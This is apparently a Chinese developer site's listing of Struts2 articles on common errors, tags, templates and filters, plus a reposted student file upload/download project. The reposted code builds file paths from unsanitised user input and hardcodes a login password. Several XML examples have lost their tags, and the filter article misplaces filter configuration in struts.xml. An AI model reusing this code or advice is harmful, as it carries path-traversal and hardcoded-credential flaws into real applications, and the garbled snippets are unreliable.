前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[Struts2反射实例化Action类机...]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
Struts2
Action类实例化失败:Unable to instantiate action, Class com.example.MyAction——深入解析Struts2框架中的问题与解决方案 1. 引言 在使用Apache Struts2进行Java Web开发时,我们可能会遇到一个常见的运行时错误:“Unable to instantiate action, Class com.example.MyAction”。这个错误提示是在告诉我们,Struts2框架在尝试创建指定的Action类时遇到了点状况。就像这次,它正努力生成一个名叫com.example.MyAction的家伙,结果却不那么顺利。这不仅影响到我们的业务逻辑执行,也阻碍了页面跳转等一系列交互过程。这篇东西,咱们会手把手地通过实实在在的代码实例,一起抽丝剥茧,探究这个问题背后的真相,同时还会给你献上一些实用的解决妙招。 2. 问题剖析 情景还原 假设你正在使用Struts2构建一个用户登录功能,并定义了一个处理登录请求的Action类MyAction: java package com.example; public class MyAction extends ActionSupport { private String username; private String password; // Getter and Setter methods for username and password... @Override public String execute() throws Exception { // Your login logic here... return "success"; } } 然后在struts.xml配置文件中映射该Action: xml /success.jsp 当用户发起登录请求访问login.action时,如果出现“Unable to instantiate action”错误,意味着Struts2在尝试创建MyAction实例时出现了异常。 3. 原因分析 导致此类错误的原因可能有以下几点: - Action类未正确编译或部署:确保你的Action类已经被成功编译并且包含在WEB-INF/classes目录下,或者被正确的打包到WAR文件中。 - Action类没有默认构造函数:Struts2通过反射机制来创建Action对象,所以必须存在无参数的构造函数。 java // 正确示例 - 提供默认构造函数 public class MyAction extends ActionSupport { public MyAction() { // ... } // 其他代码... } - 依赖注入问题:如果你在Action类中使用了@Autowired等注解进行依赖注入,但在Spring容器还未完全初始化时就尝试实例化Action,也可能引发此问题。 - 类路径问题:检查你的类路径设置是否正确,确保Struts2能找到并加载对应的Action类。 4. 解决方案 针对上述原因,我们可以采取如下措施: (1) 检查编译和部署情况 确保你的Java源码已成功编译并部署到正确的目录结构中。 (2) 添加默认构造函数 无论你的Action类是否有自定义构造函数,都应添加一个默认构造函数以满足Struts2的实例化需求。 (3) 确保依赖注入顺序 如果是Spring与Struts2整合的问题,需要调整配置以保证Spring容器在Struts2开始实例化Action之前完成初始化。 (4) 核对类路径 确认web应用的类路径设置正确无误,确保能够找到并加载到com.example.MyAction类。 5. 总结与探讨 遇到“Unable to instantiate action”这类错误时,切勿慌乱,它通常是由于一些基础设置或编码规范问题所引起的。作为一个开发者,在我们每天敲代码的过程中,真的得对这些问题上点心,就像侦探破案一样,得仔仔细细地排查、调试。这样咱们才能真正摸清Struts2框架是怎么工作的,把它玩转起来,以后类似的错误才不会找上门来。同时呢,不断回顾、归纳总结这些经验教训,并且乐于分享给大伙儿,这对我们个人技术能力的提升,以及整个团队协作效率的提高,那可是大有裨益,可以说帮助不要太大!让我们携手共进,在实践中深化对Struts2框架的理解,共同面对并解决各种技术挑战!
2023-04-28 14:54:56
67
寂静森林
Struts2
Struts2中“Java.lang.NullPointerException in Action class while executing method 'execute'”问题解析与解决方案 在我们深入使用Struts2框架进行Java Web开发时,偶尔会遇到一种常见的运行时异常——Java.lang.NullPointerException,尤其在Action类执行execute方法时。这篇东西,咱们就来点儿接地气的,从实际动手干的视角,一边瞅着代码实例,一边掰扯这个问题是怎么冒出来的、怎么把它摆平的,还有怎样提前给它上个“紧箍咒”,预防它再出来闹腾。 1. 异常现象分析 首先,让我们通过一个示例来直观感受一下这个问题。假设我们有一个简单的Struts2 Action类: java public class UserAction extends ActionSupport { private UserService userService; // 这是一个依赖注入的对象 public String execute() { User user = userService.getUserById(1); // 假设这里调用服务层获取用户信息 // ... 其他业务逻辑 return SUCCESS; } // getter 和 setter 方法省略... } 当执行上述execute方法时,如果出现NullPointerException,则意味着在执行userService.getUserById(1)这行代码时,userService对象未被正确初始化,其值为null。 2. 问题根源探究 原因一:依赖注入失败 在Struts2中,我们通常利用框架的依赖注入功能来实现Action和Service之间的解耦。就像刚才举的例子那样,如果咱们没有给userService这个家伙喂饱饭(也就是没有正确注入它),或者在喂饭的过程中出了岔子,那么到执行execute方法的时候,userService就会变成一个空肚子(null),这样一来,就难免会闹肚子(引发异常)了。 原因二:实例化时机不当 另一种可能的情况是,尽管在配置文件中设置了依赖注入,但可能由于某些原因(例如配置错误或加载顺序问题),导致注入的服务对象尚未初始化完成,此时访问也会抛出空指针异常。 3. 解决方案及示例 解决方案一:确保依赖注入生效 在Struts2的配置文件中(通常是struts.xml),我们需要明确指定Action类中需要注入的属性和服务对象的关系: xml /success.jsp userServiceBean 解决方案二:检查并修正实例化顺序 如果确认了依赖注入配置无误,但仍出现空指针异常,则应检查应用启动过程中相关Bean的加载顺序,确保在Action类执行execute方法之前,所有依赖的对象已经成功初始化。 解决方案三:防御性编程 无论何种情况,我们在编码时都应当遵循防御性编程原则,对可能为null的对象进行判空处理: java public class UserAction extends ActionSupport { private UserService userService; public String execute() { if (userService != null) { // 防御性判空 User user = userService.getUserById(1); // ... 其他业务逻辑 } else { System.out.println("userService is not initialized correctly!"); // 打印日志或采取其他容错处理 } return SUCCESS; } // getter 和 setter 方法省略... } 4. 总结与思考 面对“Java.lang.NullPointerException in Action class while executing method 'execute'”这样的问题,我们需要从多方面进行排查和解决。不仅仅是对Struts2框架的依赖注入机制了如指掌,更要像侦探一样时刻保持警惕,做好咱们的防御性编程工作。为啥呢?这就像是给程序穿上防弹衣,能有效防止那些突如其来的运行时异常搞崩我们的程序,让程序稳稳当当地跑起来,不尥蹶子。在实际做项目的时候,把这些技巧学懂了、用溜了,那咱们的开发速度和代码质量绝对会嗖嗖往上涨,没跑儿!
2023-06-26 11:07:11
69
青春印记
转载文章
...实并删除相应内容。 Struts上传、下载功能结合 /20171105_shiyan_upanddown/src/nuc/sw/action/DocDownloadAction.java package nuc.sw.action;import java.io.InputStream;import org.apache.struts2.ServletActionContext;import com.opensymphony.xwork2.ActionSupport;public class DocDownloadAction extends ActionSupport { private String downPath;//返回InputStream流方法public InputStream getInputStream() throws Exception{ downPath = new String(downPath.getBytes("ISO8859-1"),"utf-8");//默认从WebAPP根目录下取资源return ServletActionContext.getServletContext().getResourceAsStream(downPath);}public String getDownPath(){return downPath;}public void setDownPath(String downPath){this.downPath=downPath;}public String getDownloadFileName(){//downPath.subString是截取downPath的一部分String downFileName=downPath.substring(7);try{downFileName = new String(downFileName.getBytes("iso8859-1"),"utf-8");//downFileName=new String(downFileName.getBytes(),"utf-8");}catch(Exception e){e.printStackTrace();}return downFileName;}@Overridepublic String execute() throws Exception { return SUCCESS;} } /20171105_shiyan_upanddown/src/nuc/sw/action/DocUploadAction.java package nuc.sw.action;import java.io.BufferedInputStream;import java.io.BufferedOutputStream;import java.io.File;import java.io.FileInputStream;import java.io.FileOutputStream;import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.util.Date;import org.apache.struts2.ServletActionContext;import com.opensymphony.xwork2.ActionSupport;public class DocUploadAction extends ActionSupport {private String name;private File[] upload;private String[] uploadContentType;private String[] uploadFileName;private String savePath;private Date createTime;public String getName() {return name;}public void setName(String name) {this.name = name;}public File[] getUpload() {return upload;}public void setUpload(File[] upload) {this.upload = upload;}public String[] getUploadContentType() {return uploadContentType;}public void setUploadContentType(String[] uploadContentType) {this.uploadContentType = uploadContentType;}public String[] getUploadFileName() {return uploadFileName;}public void setUploadFileName(String[] uploadFileName) {this.uploadFileName = uploadFileName;}public String getSavePath() {return savePath;}public void setSavePath(String savePath) {this.savePath = savePath;}public Date getCreateTime(){ createTime=new Date();return createTime;}public static void copy(File source,File target){ InputStream inputStream=null;OutputStream outputStream=null;try{inputStream=new BufferedInputStream(new FileInputStream(source));outputStream=new BufferedOutputStream(new FileOutputStream(target));byte[] buffer=new byte[1024];int length=0;while((length=inputStream.read(buffer))>0){outputStream.write(buffer, 0, length);} }catch(Exception e){e.printStackTrace();}finally{if(null!=inputStream){try {inputStream.close();} catch (IOException e2) {e2.printStackTrace();} }if(null!=outputStream){try{outputStream.close();}catch(Exception e2){e2.printStackTrace();} }} }@Overridepublic String execute() throws Exception { for(int i=0;i<upload.length;i++){ String path=ServletActionContext.getServletContext().getRealPath(this.getSavePath())+"\\"+this.uploadFileName[i];File target=new File(path);copy(this.upload[i],target);}return SUCCESS;} } /20171105_shiyan_upanddown/src/nuc/sw/action/LoginAction.java package nuc.sw.action;import java.util.regex.Pattern;import com.opensymphony.xwork2.ActionContext;import com.opensymphony.xwork2.ActionSupport;public class LoginAction extends ActionSupport {//属性驱动校验private String username;private String password;public String getUsername() {return username;}public void setUsername(String username) {this.username = username;}public String getPassword() {return password;}public void setPassword(String password) {this.password = password;}//手动检验@Overridepublic void validate() {// TODO Auto-generated method stub//进行数据校验,长度6~15位 if(username.trim().length()<6||username.trim().length()>15||username==null) {this.addFieldError("username", "用户名长度不合法!");}if(password.trim().length()<6||password.trim().length()>15||password==null) {this.addFieldError("password", "密码长度不合法!");} }//登陆业务逻辑public String loginMethod() {if(username.equals("chenghaoran")&&password.equals("12345678")) {ActionContext.getContext().getSession().put("user", username);return "loginOK";}else {this.addFieldError("err","用户名或密码不正确!");return "loginFail";} }//手动校验validateXxxpublic void validateLoginMethod() {//使用正则校验if(username==null||username.trim().equals("")) {this.addFieldError("username","用户名不能为空!");}else {if(!Pattern.matches("[a-zA-Z]{6,15}", username.trim())) {this.addFieldError("username", "用户名格式错误!");} }if(password==null||password.trim().equals("")) {this.addFieldError("password","密码不能为空!");}else {if(!Pattern.matches("\\d{6,15}", password.trim())) {this.addFieldError("password", "密码格式错误!");} }} } /20171105_shiyan_upanddown/src/nuc/sw/interceptor/LoginInterceptor.java package nuc.sw.interceptor;import com.opensymphony.xwork2.Action;import com.opensymphony.xwork2.ActionContext;import com.opensymphony.xwork2.ActionInvocation;import com.opensymphony.xwork2.ActionSupport;import com.opensymphony.xwork2.interceptor.AbstractInterceptor;public class LoginInterceptor extends AbstractInterceptor {@Overridepublic String intercept(ActionInvocation arg0) throws Exception {// TODO Auto-generated method stub//判断是否登陆,通过ActionContext访问SessionActionContext ac=arg0.getInvocationContext();String username=(String)ac.getSession().get("user");if(username!=null&&username.equals("chenghaoran")) {return arg0.invoke();//放行}else {((ActionSupport)arg0.getAction()).addActionError("请先登录!");return Action.LOGIN;} }} /20171105_shiyan_upanddown/src/struts.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.1.7//EN""http://struts.apache.org/dtds/struts-2.1.7.dtd"><struts><constant name="struts.i18n.encoding" value="utf-8"/><package name="default" extends="struts-default"><interceptors><interceptor name="login" class="nuc.sw.interceptor.LoginInterceptor"></interceptor></interceptors> <action name="docUpload" class="nuc.sw.action.DocUploadAction"><!-- 使用fileUpload拦截器 --><interceptor-ref name="fileUpload"><!-- 指定允许上传的文件大小最大为50000字节 --><param name="maximumSize">50000</param></interceptor-ref><!-- 配置默认系统拦截器栈 --><interceptor-ref name="defaultStack"/><!-- param子元素配置了DocUploadAction类中savePath属性值为/upload --><param name="savePath">/upload</param><result>/showFile.jsp</result><!-- 指定input逻辑视图,即不符合上传要求,被fileUpload拦截器拦截后,返回的视图页面 --><result name="input">/uploadFile.jsp</result></action> <action name="docDownload" class="nuc.sw.action.DocDownloadAction"><!-- 指定结果类型为stream --><result type="stream"><!-- 指定下载文件的文件类型 text/plain表示纯文本 --><param name="contentType">application/msword,text/plain</param><!-- 指定下载文件的入口输入流 --><param name="inputName">inputStream</param><!-- 指定下载文件的处理方式与文件保存名 attachment表示以附件形式下载,也可以用inline表示内联即在浏览器中直接显示,默认值为inline --><param name="contentDisposition">attachment;filename="${downloadFileName}"</param><!-- 指定下载文件的缓冲区大小,默认为1024 --><param name="bufferSize">40960</param></result></action><action name="loginAction" class="nuc.sw.action.LoginAction" method="loginMethod"><result name="loginOK">/uploadFile.jsp</result><result name="loginFail">/login.jsp</result><result name="input">/login.jsp</result></action> </package></struts> /20171105_shiyan_upanddown/WebContent/login.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>登录页</title><s:head/></head><body><s:actionerror/><s:fielderror fieldName="err"></s:fielderror><s:form action="loginAction" method="post"> <s:textfield label="用户名" name="username"></s:textfield><s:password label="密码" name="password"></s:password><s:submit value="登陆"></s:submit></s:form></body></html> /20171105_shiyan_upanddown/WebContent/showFile.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>显示上传文档</title></head><body><center><font style="font-size:18px;color:red">上传者:<s:property value="name"/></font><table width="45%" cellpadding="0" cellspacing="0" border="1"><tr><th>文件名称</th><th>上传者</th><th>上传时间</th></tr><s:iterator value="uploadFileName" status="st" var="doc"><tr><td align="center"><a href="docDownload.action?downPath=upload/<s:property value="doc"/>"><s:property value="doc"/> </a></td><td align="center"><s:property value="name"/></td><td align="center"><s:date name="createTime" format="yyyy-MM-dd HH:mm:ss"/></td></tr></s:iterator></table></center></body></html> /20171105_shiyan_upanddown/WebContent/uploadFile.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>多文件上传</title></head><body><center><s:form action="docUpload" method="post" enctype="multipart/form-data"><s:textfield name="name" label="姓名" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:submit value="确认上传" align="center"/></s:form></center></body></html> 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_34101492/article/details/78811741。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-12 20:53:42
140
转载
Struts2
...fined for action method return value”在Struts2中的探讨与解决 --- 1. 引言 当我们深入使用Struts2进行Java Web开发时,可能会遇到一种常见的运行时错误——"No result type defined for action method return value". 这种错误通常出现在我们配置的Action类方法返回值无法匹配到预定义的结果类型时。这次,咱将手牵手、一步步深挖这个错误背后的真相,不仅限于理论讲解,还会结合实际的代码实例,让大家真真切切地看到如何解决这个问题,以及如何提前做好防范,让这类错误无处遁形。 2. 错误的理解与解读 首先,让我们来共同剖析一下这个错误信息。在Struts2这个框架里,当你执行完一个Action方法后,它会像个聪明的小助手一样,根据你这个方法返回的结果字符串,去找到对应的那个结果类型处理器。这就像是拿着一把钥匙去找对应的锁一样,结果字符串就是钥匙,结果类型处理器就是那个特定的锁。若Struts2找不到与之匹配的结果类型,就会抛出此异常。这就像是你给一位厨房大厨一张满载神秘食材的任务卡,可关键的是,菜单上并没有教他具体怎么料理这些稀奇古怪的玩意儿,这样一来,大厨可就懵圈了,完全不知道从何下手。 3. 示例代码与解析 为了更好地理解这个问题,我们先看一段简单的Struts2 Action类代码示例: java public class SampleAction extends ActionSupport { public String execute() { // 执行一些业务逻辑... return "customResult"; // 返回自定义结果字符串 } } 然后,在struts.xml配置文件中,如果我们没有为"customResult"定义相应的结果类型: xml 运行程序并调用该Action时,Struts2就无法找到对应的“customResult”的结果处理器,从而抛出"No result type defined for action method return value: customResult"的错误。 4. 解决方案 要解决这个问题,我们需要在struts.xml配置文件中为"customResult"添加相应结果类型定义: xml /WEB-INF/pages/success.jsp 在这个例子中,我们指定了当execute方法返回"customResult"时,系统应该跳转到"/WEB-INF/pages/success.jsp"页面。这样一来,Struts2就能准确无误地处理Action方法的返回值了。 5. 预防与优化 为了避免这类问题的发生,我们在设计和编写Action类时应遵循以下原则: - 明确每个Action方法可能返回的所有结果类型,并在struts.xml中预先配置好。 - 在团队协作中,统一结果类型命名规则,保持良好的文档记录,方便后续维护和扩展。 - 利用Struts2的通配符结果类型或者默认结果类型等特性,简化配置过程,提高开发效率。 6. 总结 在我们的编程实践中,理解和掌握Struts2框架的工作机制至关重要。当你遇到像"No result type defined for action method return value"这样的怪咖问题时,咱们不光得摸清怎么把它摆平,更关键的是,得学会从这个坑里爬出来的同时,顺手拔点“经验值”,让自己在编程这条路上的修养越来越深厚。这样子做,咱们才能在未来的开发道路上越走越远、越走越稳当,确保每次编程的旅程都充满刺激的挑战和满满的收获。
2023-07-16 19:18:49
80
星河万里
Struts2
... Web开发框架时,Struts2无疑是一个无法忽视的重要角色。它以其强大的MVC模式和丰富的标签库深受开发者喜爱。今天,咱们就来好好唠一唠,在JSP页面上如何灵活运用Struts2给咱提供的标签这个小玩意儿,让它帮咱们把藏在集合深处的数据统统挖出来,展示得明明白白的。这个过程就像一个寻宝游戏,让我们一起挖掘那些深藏在集合里的“宝藏”。 2. 标签概述 s:iterator标签是Struts2提供的一种用于迭代(遍历)集合或数组的强大工具。这个小家伙绝对是个实力派,它能轻轻松松地把后端送过来的一堆数据挨个儿展示在前端页面上,这可真是让我们的开发工作变得轻松多了,简直就像搭积木一样简单有趣! 3. 集合数据的准备与传递 首先,我们需要在Action类中准备一个集合,并将其作为属性值传递到视图层(JSP页面)。假设我们有一个包含多个用户信息的List: java public class UserAction extends ActionSupport { private List userList; // 假设User是一个实体类 public String execute() { // 初始化或者从数据库获取userList // ... return SUCCESS; } // getter and setter 方法 public List getUserList() { return userList; } public void setUserList(List userList) { this.userList = userList; } } 4. 在JSP中使用标签遍历集合 接下来,在JSP页面中,我们可以利用标签遍历上述的userList集合: jsp <%@ taglib prefix="s" uri="/struts-tags"%> ... ID Name Email 上述代码段中,value="userList"指定了要遍历的集合对象,而status="rowstatus"则定义了一个名为rowstatus的迭代状态变量,可以用来获取当前迭代的索引、是否为奇数行/偶数行等信息。 5. 迭代状态变量的应用 在实际应用中,迭代状态变量非常有用,例如,我们可以根据行号决定表格行的颜色: jsp oddRowevenRow"> 在这个示例中,我们通过rowstatus.odd检查当前行是否为奇数行,然后动态设置CSS样式。 6. 结语标签在处理集合数据时的灵活性和便捷性可见一斑。它不仅能让我们超级高效地跑遍所有数据,还能加上迭代状态变量这个小玩意儿,让前端展示效果噌噌噌地往上蹿,变得更带劲儿。在实际做项目开发这事儿的时候,要是能把这个特性玩得贼溜,还能灵活运用,那简直就像给咱们编写Web页面插上了一对翅膀,让代码读起来更明白易懂,维护起来也更加轻松省力。这就是编程最让人着迷的地方啦——就像一场永不停歇的探险,你得不断尝试、动手实践,让每一个细微的技术环节都化身为打造完美产品的强大力量。
2023-01-03 18:14:02
44
追梦人
Struts2
Struts2框架中使用FreeMarker与Velocity模板加载失败问题解析 在构建Web应用程序时,Struts2作为一个强大的MVC框架深受开发者喜爱。然而,在实际做开发的时候,我们可能会遇到这么个情况:当我们选用FreeMarker或者Velocity来当视图技术时,突然模板加载不成功了,这无疑就像个小插曲,给我们的开发进程踩了个“刹车”,带来不少麻烦和困扰。本文将深入探讨这个问题,并通过实例代码进行解析和解决。 1. 引言 Struts2与模板引擎 首先,让我们回顾一下Struts2框架的核心思想。在MVC模式下,Struts2中的Action负责处理业务逻辑,而视图部分则通常借助于FreeMarker或Velocity这样的模板引擎来渲染页面。这两种模板引擎均能帮助我们将数据模型(Model)与表现形式(View)分离,提高代码的可维护性和复用性。 2. 模板加载失败 常见原因分析 ① 路径配置错误 当我们在Struts2中配置模板路径时,如果路径设置不正确,那么模板文件就无法被正确加载。例如,在struts.xml中配置FreeMarker的结果类型时: xml /WEB-INF/templates/success.ftl 如果success.ftl不在指定的/WEB-INF/templates/目录下,就会导致模板加载失败。 ② 模板引擎初始化异常 Struts2在启动时需要对FreeMarker或Velocity引擎进行初始化,如果相关配置如类加载器、模板路径等出现问题,也会引发模板加载失败。例如,对于Velocity,我们需要确保其资源配置正确: xml ③ 文件编码不一致 若模板文件的编码格式与应用服务器或模板引擎默认编码不匹配,也可能造成模板加载失败。例如,FreeMarker的默认编码是ISO-8859-1,如果我们创建的ftl文件是UTF-8编码,就需要在配置中明确指定编码: properties 在freemarker.properties中配置 default_encoding=UTF-8 3. 解决方案及实战演示 ① 核实并修正模板路径 检查并确认struts.xml中的结果类型配置是否指向正确的模板文件位置。如果你把模板放在了其他地方,记得及时更新路径。 ② 正确初始化模板引擎 确保配置文件(如velocity.properties和toolbox.xml)的位置和内容无误,并在Struts2配置中正确引用。如遇异常,可通过日志排查具体错误信息以定位问题。 ③ 统一文件编码 根据实际情况,调整模板文件编码或者模板引擎的默认编码设置,确保二者一致。 4. 结语 模板加载失败背后的人工智能思考 在面对模板加载失败这类看似琐碎却影响项目运行的问题时,我们需要像侦探一样细心观察、抽丝剥茧,找出问题的根本原因。同时呢,咱也要真正认识到,甭管是挑FreeMarker还是Velocity,重点不在选哪个工具,而在于怎么把它们配置得恰到好处,编码要规规矩矩的,还有就是深入理解这些框架背后的运行机制,这才是王道啊!在这个过程中,我们就像在升级打怪一样,不断从实践中汲取经验,让解决各种问题的能力蹭蹭上涨。同时呢,也像是挖掘宝藏一般,对Struts2框架以及整个Web开发大世界有了更深入、更接地气的理解和实践操作。 以上内容,我试图以一种更为口语化、情感化的表达方式,带您走过排查和解决Struts2框架中模板加载失败问题的全过程。希望通过这些实实在在的例子和我们互动式的讨论,让您不仅能摸清表面现象,更能洞察背后的原因,这样一来,在未来的开发工作中您就能更加得心应手,挥洒自如啦!
2024-03-07 10:45:28
175
风轻云淡
Struts2
Struts2 , Struts2是一个基于MVC(模型-视图-控制器)设计模式的Java web应用程序框架,由Apache软件基金会提供。它主要用于构建企业级Java Web应用,通过简化和标准化应用程序开发过程,提供了丰富的标签库、强大的表单处理功能以及灵活的插件扩展机制。在Struts2中,开发者可以使用配置文件struts.xml来定义Action、结果页面、全局常量等核心组件,实现请求与响应的映射、业务逻辑处理和页面跳转等功能。 DTD (Document Type Definition) , DTD是一种XML文档结构的标准定义方式,在本文中提到的“DOCTYPE Struts Configuration 2.3”即指Struts2.3版本的配置文件DTD定义。这个声明帮助XML解析器理解并验证struts.xml文件的语法和结构是否符合Struts2框架的要求,确保配置文件的有效性与合法性。 OGNL (Object-Graph Navigation Language) , OGNL是一种强大的表达式语言,被广泛应用于Struts2框架中进行数据绑定和访问对象属性。在Struts2中,OGNL允许开发者在Action、JSP页面和其他组件之间灵活地传递和操作数据,如从Action中提取属性值到JSP页面展现,或者动态地根据请求参数执行相应逻辑。在更高版本的Struts2中,支持了OGNL 3.0,增强了类型转换、表达式计算和安全性等方面的功能。 Convention over Configuration (约定优于配置) , 这是一种软件设计范式,强调通过遵循一定的命名约定和项目组织结构,减少开发人员编写大量配置的工作量。在Struts2框架中,通过引入注解等方式,使得一些常见的配置可以通过默认约定自动完成,从而提高开发效率和代码可读性。例如,当遵循特定的目录结构时,Struts2可以自动识别并映射Action类到相应的URL请求上,而无需手动在struts.xml中逐一配置。
2023-11-11 14:08:13
96
月影清风-t
Struts2
...,今天我们要讨论的是Struts2中的过滤器配置方法。Struts2,你知道不?这家伙可是Apache家族的一员,是个专门基于Java打造的MVC框架。它超级给力,能让我们轻轻松松地搭建起那些复杂的Web应用程序,省时又省力,简直是我们开发小哥的贴心小助手。而过滤器则是Struts2框架的一部分,它可以帮助我们在应用程序运行时进行一些预处理工作。 二、过滤器的基本概念 首先我们来了解一下什么是过滤器。在搞计算机网络编程的时候,过滤器这家伙其实就像个把关的门神,它的任务是专门逮住那些在网络里穿梭的数据包,然后仔仔细细地给它们做个全身检查,甚至还能动手改一改。这样一来,就能确保这些数据包都符合咱们定下的安全规矩或者其他特殊要求啦。在Struts2这个框架里,过滤器可是个大忙人,它主要负责干些重要的活儿,比如把关访问权限,确保只有符合条件的请求才能进门;还有处理那些请求参数,把它们收拾得整整齐齐,方便后续操作使用。 三、如何在Struts2中配置过滤器? 在Struts2中,我们可以使用struts.xml文件来配置过滤器。下面我们就来看一下具体的步骤。 1. 在项目的src/main/webapp/WEB-INF目录下创建一个名为struts.xml的文件。 2. 在struts.xml文件中,我们需要定义一个filter标签,这个标签用于定义过滤器的名称、类型以及属性。 例如: xml MyFilter com.example.MyFilter paramName paramValue 在这个例子中,我们定义了一个名为"MyFilter"的过滤器,并指定了它的类型为com.example.MyFilter。同时,我们还定义了一个名为"paramName"的初始化参数,它的值为"paramValue"。 3. 在struts.xml文件中,我们还需要定义一个filter-mapping标签,这个标签用于指定过滤器的应用范围。 例如: xml MyFilter /index.action 在这个例子中,我们将我们的过滤器应用到所有以"/index.action"结尾的URL上。 四、实战演示 下面我们通过一个简单的实例,来看看如何在Struts2中配置和使用过滤器。 假设我们有一个名为MyFilter的过滤器类,这个类包含了一个doFilter方法,这个方法将在每次请求到达服务器时被调用。我们想要在这个方法中对请求参数进行一些处理。 首先,我们在项目中创建一个名为MyFilter的类,然后重写doFilter方法。 java public class MyFilter implements Filter { public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest req = (HttpServletRequest) request; HttpServletResponse res = (HttpServletResponse) response; // 处理请求参数 String param = req.getParameter("param"); System.out.println("Filter received parameter: " + param); // 继续执行下一个过滤器 chain.doFilter(request, response); } } 然后,在项目的src/main/webapp/WEB-INF目录下创建一个名为struts.xml的文件,配置我们的过滤器。 xml MyFilter com.example.MyFilter MyFilter .action 这样,每当有请求到达服务器时,我们的MyFilter类就会被调用,并且可以在doFilter方法中对请求参数进行处理。 五、结语 总的来说,Struts2中的过滤器是一个非常强大的工具,它可以帮助我们更好地控制应用程序的运行流程。希望通过今天的分享,能够帮助你更好地理解和使用Struts2中的过滤器。如果你有任何问题,欢迎在评论区留言交流,我会尽力为你解答。
2023-07-17 17:26:48
59
柳暗花明又一村-t
Struts2
当Action方法返回null或空字符串时,Struts2会如何响应? 在我们深入探讨Struts2框架处理Action方法返回null或空字符串的机制之前,让我们先建立起对Struts2基础架构的理解。Struts2,这可是Java Web MVC框架中的“大块头”,它的设计理念贼酷炫,就是把用户的各种请求找到对应的Action类的某个方法上,然后让这个方法来执行咱们需要的业务逻辑。就比如你点了个按钮,它就像个超级智能导航员,把你引到该去的地方,完成一系列操作后,再根据这个方法返回的结果,灵活地跳转到下一个页面或者进行其他相应的动作,一切就是这么顺滑自然! 1. Struts2 Action的工作流程 当用户发起一个HTTP请求时,Struts2会通过一系列拦截器组件解析请求,并将其转发至对应的Action类中指定的方法(通常称为execute方法)。这个方法跑完后,它会送你一个字符串作为“小礼物”,这个字符串就像个贴心的向导,告诉你下一步该跳转到哪个视图资源。 java public class SampleAction extends ActionSupport { public String execute() { // 执行业务逻辑... // 返回一个字符串,用于决定视图跳转 return "success"; // 或者 "error"、"input" 等 } } 2. 当Action方法返回null或空字符串时 现在,我们正式进入主题:当Action方法返回null或空字符串时,Struts2将会如何反应呢? - 情况一:返回null 假设我们的Action方法如下面所示: java public class NullReturnAction extends ActionSupport { public String execute() { // 这里没有明确返回任何字符串 // 实际上,默认会返回null } } 在这种情况下,Struts2框架并不会因为Action方法返回null而抛出异常。换个方式来说,实际上它有个默认的行动法则:一旦Action方法返回空值,Struts2这家伙就会觉得这是个不明类型的结果。于是乎,它会自然而然地去找“struts-default.xml”这个配置文件中的“default”结果,并触发它来应对这种情况。如果没有明确地给这个家伙设定一个默认的结果,那可就麻烦了,搞不好会让程序运行时出岔子,或者没法顺利地蹦跶到我们想要的那个页面视图上。 - 情况二:返回空字符串 同样,如果我们让Action方法返回一个空字符串: java public class EmptyStringReturnAction extends ActionSupport { public String execute() { // 返回一个空字符串 return ""; } } 此时,Struts2对于空字符串的处理方式与null类似,也会尝试寻找并执行名为""(空字符串)的结果映射。若配置文件中未找到对应的结果映射,则同样可能导致运行时错误或无法正常完成视图跳转。 3. 结论与建议 因此,在编写Struts2应用时,我们需要确保Action方法始终返回一个有意义的结果字符串,以便框架能够准确地定位和渲染对应的视图资源。为了提高代码可读性和降低潜在风险,强烈建议遵循以下原则: - 明确为每个Action方法设定合理的返回结果,例如:"success"表示成功执行并跳转到成功页面,"error"则表示出现错误并跳转到错误页面等。 - 在struts.xml配置文件中,为所有可能的返回结果预先定义好结果映射,包括处理null或空字符串返回值的情况。 